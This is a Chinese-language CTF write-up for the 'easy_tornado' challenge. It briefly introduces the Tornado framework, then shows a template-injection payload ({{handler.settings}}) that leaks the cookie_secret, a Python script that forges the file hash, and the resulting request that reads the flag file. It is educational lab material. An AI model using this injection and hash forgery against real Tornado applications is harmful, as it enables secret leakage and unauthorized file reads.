一、Tornado是什么?
Tornado是一种 Web 服务器软件的开源版本。Tornado 和主流Web 服务器框架(包括大多数 Python 的框架)有着明显的区别:它是非阻塞式服务器,而且速度相当快。 得利于其非阻塞的方式和对epoll的运用,Tornado 每秒可以处理数以千计的连接,因此 Tornado 是实时 Web 服务的一个 理想框架。
二、easy_tornado 1
1、 判断发现是模板注入
data:image/s3,"s3://crabby-images/74bdf/74bdfcb74c4a34764a6cda7502cdd5b58799f225" alt="在这里插入图片描述"
2、获取cookie_secret
由于handler指向的处理当前这个页面的RequestHandler对象,RequestHandler.settings指向self.application.settings,因此handler.settings指向RequestHandler.application.settings。构造payload获取cookie_secret
/error?msg={{handler.settings}}
data:image/s3,"s3://crabby-images/3b8f7/3b8f7be6889ad519ef4dafa8322b1636bbb87004" alt="在这里插入图片描述"
3、使用python构造参数
data:image/s3,"s3://crabby-images/61059/61059d7a4bfd3b294bdfcba1c737613483af9dbb" alt="在这里插入图片描述" data:image/s3,"s3://crabby-images/71b58/71b58b218651bbf1c2831d4609e36a1af3a684fd" alt=""
import hashlib
text = "/fllllllllllllag"
h1=hashlib.md5()
h1.update(text.encode(encoding='utf8'))
md5=h1.hexdigest()
print("加密结果:"+str(md5))
cookie_secret = "a14501b7-a97e-42c7-8cec-5d5fa1a9f74b"
text1 = str(cookie_secret) + str(md5)
print("加密结果:"+text1)
h3 = hashlib.md5()
h3.update(text1.encode(encoding='utf8'))
md6 = h3.hexdigest()
print("加密结果:"+str(md6))
data:image/s3,"s3://crabby-images/d7dab/d7dab4f16e5d5d3d80f73e689514dbbb1922825f" alt="在这里插入图片描述"
4、得到flag
根据题目的提示,我们尝试/file?filename=/fllllllllllllag&filehash=3babc8d6a13f4aed1b9d64afe9c2e21c
data:image/s3,"s3://crabby-images/14f91/14f912283f8f870a071036ccc7b3d5d768f90109" alt="在这里插入图片描述" 本文借鉴https://blog.csdn.net/qin9800/article/details/105349089,如有冒犯或错误,请及时告知。谢谢!
|